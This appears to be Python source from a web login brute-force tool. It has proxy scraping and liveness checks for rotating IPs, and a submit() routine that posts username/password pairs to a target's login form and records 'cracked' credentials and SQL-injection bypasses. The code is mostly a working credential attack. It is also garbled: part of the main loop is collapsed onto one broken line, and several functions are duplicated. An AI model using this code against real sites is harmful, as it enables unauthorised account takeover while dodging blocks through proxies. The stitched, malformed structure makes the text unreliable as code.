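def checProxyConn(proxyAddr, target, result, verbose):
    """Probe one proxy by opening ``target`` through it; record it on success.

    Args:
        proxyAddr: Proxy address handed to ``Browser.set_random_proxy``.
        target: URL opened through the proxy as the liveness probe.
        result: Queue-like sink; ``proxyAddr`` is ``put`` on it when the
            request succeeds.
        verbose: When true, per-proxy progress and failures are logged.

    Side effects:
        Sets the module-level ``set_break`` flag to ``True`` on
        ``KeyboardInterrupt``.
    """
    global set_break
    # Bound before the try so cleanup never relies on swallowing a NameError
    # when Browser() itself fails.
    proxyTest = None
    try:
        proxyTest = Browser()
        proxyTest.set_random_proxy(proxyAddr)
        if verbose:
            events.info("Testing %s" % (proxyAddr))
        proxyTest.open_url(target)
        if verbose:
            events.success("Connected via %s" % (proxyAddr), "PROXY")
        # NOTE(review): a successful probe only shows that the proxy relays
        # traffic; its operator can still observe or alter what passes through.
        result.put(proxyAddr)
    except KeyboardInterrupt:
        events.error("Terminated by user", "STOPPED")
        set_break = True
    except Exception as error:
        if verbose:
            events.error("[%s] [%s]" % (proxyAddr, error))
    finally:
        if proxyTest is not None:
            try:
                proxyTest.close()
            except Exception:
                # Closing is best-effort; a failed close must not turn a
                # completed probe into an error.
                pass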
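def checkProxyConnProvider(url="https://free-proxy-list.net/"):
    """Download the proxy-listing page and return its raw response body.

    Args:
        url: Page to fetch; defaults to the public free-proxy-list site.

    Returns:
        Whatever ``Browser.get_response()`` yields for the fetched page.

    Exits the process with status 1 (after logging) when the fetch fails.
    """
    # Bound before the try: if Browser() raises, the finally block previously
    # hit an unbound name and replaced the intended exit with a NameError.
    getproxy = None
    try:
        events.info("Gathering proxies from %s" % (url))
        getproxy = Browser()
        getproxy.open_url(url)
        events.success("Gathering proxies completed", "PROXY")
        # NOTE(review): the body is third-party content and should be treated
        # as untrusted input by whoever parses it.
        return getproxy.get_response()
    except Exception as error:
        events.error("%s" % (error), "PROXY")
        sys.exit(1)
    finally:
        if getproxy is not None:
            getproxy.close()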
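def getnew(options):
    """Fetch a fresh proxy list from the provider page and save it to ``PROXY_PATH``.

    Args:
        options: Accepted for interface compatibility; not read here.

    Exits the process with status 1 when the page cannot be downloaded, the
    response cannot be parsed, or the list cannot be written.
    """

    def is_valid_endpoint(entry):
        """Return True when ``entry`` ("a.b.c.d:port") is within numeric range."""
        host, _, port = entry.rpartition(":")
        octets_ok = all(int(octet) <= 255 for octet in host.split("."))
        return octets_ok and 0 < int(port) <= 65535

    def parse_proxy(response):
        """Return ``ip:port`` strings scraped from the provider's HTML table.

        Returns ``None`` (after logging) when the response cannot be parsed.
        """
        try:
            re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
            candidates = [
                element.replace("</td><td>", ":")
                for element in re.findall(re_ip, response)
            ]
            # The page is third-party content and the pattern alone accepts
            # values such as 999.999.999.999:99999, so range-check each entry
            # before it is saved and later used as a network endpoint.
            return [entry for entry in candidates if is_valid_endpoint(entry)]
        except Exception as error:
            events.error("%s" % (error), "PROXY")

    def checkProxyConnProvider(url="https://free-proxy-list.net/"):
        """Download the listing page; exit with status 1 when that fails."""
        # Bound before the try so the cleanup cannot raise on an unbound name
        # when Browser() itself fails.
        getproxy = None
        try:
            events.info("Gathering proxies from %s" % (url))
            getproxy = Browser()
            getproxy.open_url(url)
            events.success("Gathering proxies completed", "PROXY")
            return getproxy.get_response()
        except Exception as error:
            events.error("%s" % (error), "PROXY")
            sys.exit(1)
        finally:
            if getproxy is not None:
                getproxy.close()

    try:
        listproxy = parse_proxy(checkProxyConnProvider())
    except Exception as error:
        events.error("%s" % (error), "PROXY")
        listproxy = []

    # Runs only when the download step did not exit. Previously this lived in
    # a ``finally`` and, after a failed download, logged a second, misleading
    # unbound-variable error before exiting.
    try:
        # len(None) raises here when parsing failed, which ends in exit(1)
        # without overwriting the saved list.
        events.success("Gathered %s proxies" % (len(listproxy)), "PROXY")
        listproxy = "\n".join(listproxy)
        events.info("Saving result to %s" % (PROXY_PATH), "PROXY")
        file_write(PROXY_PATH, listproxy)
        events.success("New proxy list saved", "PROXY")
    except Exception as error:
        events.error("%s" % (error), "PROXY")
        sys.exit(1)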
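def check(options):
    """Probe every proxy saved in ``PROXY_PATH`` and save the live ones to ``LIVE_PATH``.

    Args:
        options: Run configuration; ``threads``, ``url`` and ``verbose`` are read.

    Working proxies are collected on ``result``, which is not defined in this
    function and is presumably a module-level queue (confirm against the
    module). Exits with status 1 when reading, probing or saving fails.
    """

    def run_threads(threads, sending, completed, total):
        """Start one batch of workers, wait for all of them, return the new count."""
        for thread in threads:
            progressbar.progress_bar(sending, completed, total)
            thread.start()
        for thread in threads:
            completed += 1
            progressbar.progress_bar(sending, completed, total)
            thread.join()
        return completed

    # The worker used to set a *global* ``set_break`` while the loop below read
    # a *local* one, so the stop request never reached the loop. An Event is
    # shared by reference and works the same on Python 2 and 3.
    stop_requested = threading.Event()

    def checProxyConn(proxyAddr, target, result, verbose):
        """Open ``target`` through ``proxyAddr``; queue the proxy if it works."""
        global set_break
        proxyTest = None
        try:
            proxyTest = Browser()
            proxyTest.set_random_proxy(proxyAddr)
            if verbose:
                events.info("Testing %s" % (proxyAddr))
            proxyTest.open_url(target)
            if verbose:
                events.success("Connected via %s" % (proxyAddr), "PROXY")
            result.put(proxyAddr)
        except KeyboardInterrupt:
            events.error("Terminated by user", "STOPPED")
            # Module-level flag kept for any existing reader of it.
            set_break = True
            stop_requested.set()
        except Exception as error:
            if verbose:
                events.error("[%s] [%s]" % (proxyAddr, error))
        finally:
            if proxyTest is not None:
                try:
                    proxyTest.close()
                except Exception:
                    # Best-effort cleanup; never mask the probe outcome.
                    pass

    try:
        # Drop blank lines (e.g. a trailing newline) so no thread is spent on
        # an empty address and the progress total is accurate.
        proxylist = [
            line.strip()
            for line in file_read(PROXY_PATH).split("\n")
            if line.strip()
        ]
        workers = []
        completed, total = 0, len(proxylist)
        trying = 0  # stays defined when the list is empty
        for trying, tryProxy in enumerate(proxylist):
            if stop_requested.is_set():
                del workers[:]
                break
            if len(workers) == options.threads:
                completed = run_threads(workers, trying, completed, total)
                del workers[:]
            worker = threading.Thread(
                target=checProxyConn,
                args=(tryProxy, options.url, result, options.verbose),
            )
            worker.daemon = True
            workers.append(worker)
        # Flush the final, possibly partial, batch.
        completed = run_threads(workers, trying, completed, total)
        del workers[:]
    except Exception as error:
        events.error("%s" % (error), "PROXY")
        sys.exit(1)
    finally:
        try:
            alive = list(result.queue)
            _data = "\n".join(alive)
            # Count the entries, not the pieces of the joined string:
            # "".split("\n") has length 1, which reported one live proxy
            # when there were none.
            events.success("%s proxy alive" % (len(alive)))
            events.info("Saving success list", "PROXY")
            file_write(LIVE_PATH, _data)
            events.success("New alive list is saved", "PROXY")
        except Exception as error:
            events.error("%s" % (error), "PROXY")
            sys.exit(1)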
result = attack(options, loginInfo) if result: for _result in result: results.append(_result) # results.append(result) else: events.error("No login request found") if "--reauth" in options.extras: from extras import reauth reauth.run(options, result) except Exception as error: traceback.print_exc() events.error("%s" % (error), "STOPPED") sys.exit(1) finally: runtime = time.time() - runtime try: if len(options.target) > 0: if len(results) > 0 and len(options.target) > 1: events.success("Cracked %s target[s]" % (len(results)), "RESULT") utils.print_table(("URL", "Username", "Password"), *results) else: events.error("No target has been cracked", "RESULT") except: pass events.success("Elapsed: %0.2f [-] %s" % (runtime, time.strftime("%Y-%m-%d %H:%M")))
def submit(options, login_field, tryCred, result):
    """Submit one credential pair to the login form and classify the response.

    Args:
        options: Run configuration; this block reads ``proxy``, ``url``,
            ``verbose``, ``txt``, ``block_text`` and ``exceptions()`` and
            writes ``block_text``.
        login_field: Login form found earlier; only compared with the form
            found now, to report that it changed.
        tryCred: Pair unpacked as ``(password, username)``.
        result: Queue-like object; accepted entries are stored as
            ``[options.url, username, password]``.

    Returns:
        ``True`` when the username is already in ``result`` or the attempt ran
        to completion, ``False`` when no login form was found on the page, and
        ``None`` when an exception was caught.
    """
    password, username = tryCred
    # Skip usernames that already have an entry in the result queue
    # (index 1 of each stored entry is the username).
    if username in [x[1] for x in list(result.queue)]:
        return True
    from cores.browser import Browser
    # Outcome label as a string; the finally block reports based on it.
    # Values set below: "False", "blocked", "SQLi", "error", "True", "exception".
    isLoginSuccess = "False"
    try:
        proc = Browser()
        if options.proxy:
            # Set proxy connect
            # NOTE(review): when a proxy is set, the submitted credentials
            # travel through it and are visible to its operator.
            proxy_address = list_choose_randomly(options.proxy)
            proc.set_random_proxy(proxy_address)
        else:
            proxy_address = ""
        proc.open_url(options.url)
        _form = find_login_form(proc.forms())
        if not _form:
            # No login form on the page: keep the response as the "blocked"
            # reference text and give up on this attempt.
            options.block_text = proc.get_response()  # TODO check if block text changes
            if options.verbose:
                isLoginSuccess = "blocked"
                events.error("Get blocked", "BRUTE")
            return False
        else:
            form_control, form_fields = _form
        if options.verbose and login_field != _form:
            events.info("Login form has been changed", "BRUTE")
        resp = proc.form_submit(form_control, form_fields, tryCred)
        from cores.analysis import get_response_diff
        # options.txt is presumably the baseline page captured earlier, as
        # bytes -- TODO confirm against the caller.
        text_changed, source_changed = get_response_diff(
            options.txt.decode('utf-8'), resp.content.decode('utf-8'))
        """
        If there is no other login form, check all changes in response
        If there is no login request from all new urls -> successfully
        == > Behavior: Login fail, click here or windows.location = login_page
        """
        # "Login form is still there. Oops"
        if find_login_form(proc.forms()):
            isLoginForm = True
        else:
            isLoginForm = False
        if not isLoginForm:
            # Follow each redirection found in the changed source and look for
            # a login form there too.
            for new_url in get_redirection(source_changed):
                if not new_url.startswith("http") and not new_url.endswith(
                        options.exceptions()):
                    # Relative link: resolve it against the target URL.
                    try:
                        from urllib.parse import urljoin
                    except ImportError:
                        from urlparse import urljoin
                    new_url = urljoin(options.url, new_url)
                # Only URLs on the same domain as the target are opened.
                if new_url and get_domain(options.url) == get_domain(new_url):
                    proc.open_url(new_url)
                    if find_login_form(proc.forms()):
                        isLoginForm = True
                        break
                    else:
                        isLoginForm = False
        if not isLoginForm:
            """
            Check SQL Injection
            1. SQL Injection
            2. Login successfully: No SQLi + No Login form
            """
            if check_sqlerror(proc.get_response()):
                isLoginSuccess = "SQLi"
            elif text_changed == source_changed and text_changed != options.block_text and options.block_text:
                # Leaves isLoginSuccess at "False".
                pass
            else:
                if resp.status_code >= 400:
                    isLoginSuccess = "error"
                else:
                    isLoginSuccess = "True"
            # "If we tried login form with username+password field"
        else:
            pass
        return True
    except Exception as error:
        """
        Sometimes, web servers return error code because of bad configurations,
        but our cred is true. This code block showing information, for special cases
        """
        isLoginSuccess = "exception"
        events.error("%s" % (error), "BRUTE")
    finally:
        # NOTE(review): the branches below pass the username and password to
        # events.* as plain text; where that output ends up is not visible here.
        if isLoginSuccess == "SQLi":
            events.success("SQL Injection bypass", "BRUTE")
            events.info("['%s': '%s']" % (username, password))
        elif isLoginSuccess == "error" and options.verbose:
            if username:
                events.error(
                    "['%s':'%s'] <--> %s" % (username, password, proxy_address),
                    "%s" % (resp.status_code))
            else:
                events.error("[%s] <--> %s" % (password, proxy_address),
                             "%s" % (resp.status_code))
        elif isLoginSuccess == "True":
            if username:
                events.found(username, password, proc.get_title())
                result.put([options.url, username, password])
            else:
                events.found('', password, proc.get_title())
                result.put([options.url, username, password])
        elif isLoginSuccess == "False" and options.verbose:
            if username:
                events.fail(
                    "['%s':'%s'] <==> %s" % (username, password, proxy_address),
                    text_changed, proc.get_title())
            else:
                events.fail("['%s'] <==> %s" % (password, proxy_address),
                            text_changed, proc.get_title())
        # NOTE(review): proc is unbound here if Browser() itself raised, so
        # this line would then raise from inside the finally block.
        proc.close()